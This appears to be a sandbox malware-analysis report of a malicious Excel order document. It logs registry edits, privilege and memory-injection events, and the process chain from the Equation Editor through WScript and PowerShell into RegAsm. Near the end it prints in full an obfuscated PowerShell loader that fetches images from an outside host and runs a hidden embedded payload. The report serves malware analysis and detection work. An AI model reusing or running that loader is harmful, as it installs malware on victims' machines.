Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2232 wrote to memory of 1680 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE C:\Windows\SysWOW64\WScript.exe
PID 2232 wrote to memory of 1680 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE C:\Windows\SysWOW64\WScript.exe
PID 2232 wrote to memory of 1680 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE C:\Windows\SysWOW64\WScript.exe
PID 2232 wrote to memory of 1680 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE C:\Windows\SysWOW64\WScript.exe
PID 624 wrote to memory of 1300 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 624 wrote to memory of 1300 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 624 wrote to memory of 1300 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 624 wrote to memory of 1300 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 1680 wrote to memory of 2320 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1680 wrote to memory of 2320 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1680 wrote to memory of 2320 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1680 wrote to memory of 2320 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2320 wrote to memory of 2808 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2320 wrote to memory of 2808 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2320 wrote to memory of 2808 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2320 wrote to memory of 2808 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2808 wrote to memory of 112 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 2808 wrote to memory of 112 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 2808 wrote to memory of 112 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 2808 wrote to memory of 112 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 2808 wrote to memory of 112 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 2808 wrote to memory of 112 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 2808 wrote to memory of 112 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 2808 wrote to memory of 112 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 2808 wrote to memory of 112 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 2808 wrote to memory of 112 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 2808 wrote to memory of 112 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 2808 wrote to memory of 112 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 2808 wrote to memory of 112 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 2808 wrote to memory of 112 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 2808 wrote to memory of 112 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 2808 wrote to memory of 112 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2780 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2780 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2780 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2780 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2780 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2780 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2780 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2780 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2648 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2648 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2648 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2648 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2648 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2648 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2648 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2764 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2764 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2764 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2764 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2764 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2764 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2764 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2764 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2368 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2368 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2368 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2368 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2368 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2368 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2368 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 112 wrote to memory of 2368 N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Order request list.xls"

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\createdkissingsomeone.vbs"

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreMDgTreDgTrevDgTreDDgTreDgTreNDgTreDgTrezDgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTre2DgTreDDgTreDgTreLwDgTrewDgTreDQDgTreNDgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre4DgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3DgTreG4DgTrebDgTreBvDgTreGEDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreEYDgTrecgBvDgTreG0DgTreTDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTreLQBuDgTreGUDgTreIDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBUDgTreGUDgTreeDgTreB0DgTreC4DgTreRQBuDgTreGMDgTrebwBkDgTreGkDgTrebgBnDgTreF0DgTreOgDgTre6DgTreFUDgTreVDgTreBGDgTreDgDgTreLgBHDgTreGUDgTredDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreUwBUDgTreEEDgTreUgBUDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBFDgTreE4DgTreRDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwBlDgTreCDgTreDgTreMDgTreDgTregDgTreC0DgTreYQBuDgTreGQDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwB0DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreKwDgTre9DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCDgTreDgTrePQDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTre7DgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBTDgTreHUDgTreYgBzDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTresDgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBDDgTreG8DgTrebgB2DgTreGUDgTrecgB0DgTreF0DgTreOgDgTre6DgTreEYDgTrecgBvDgTreG0DgTreQgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreKQDgTre7DgTreCDg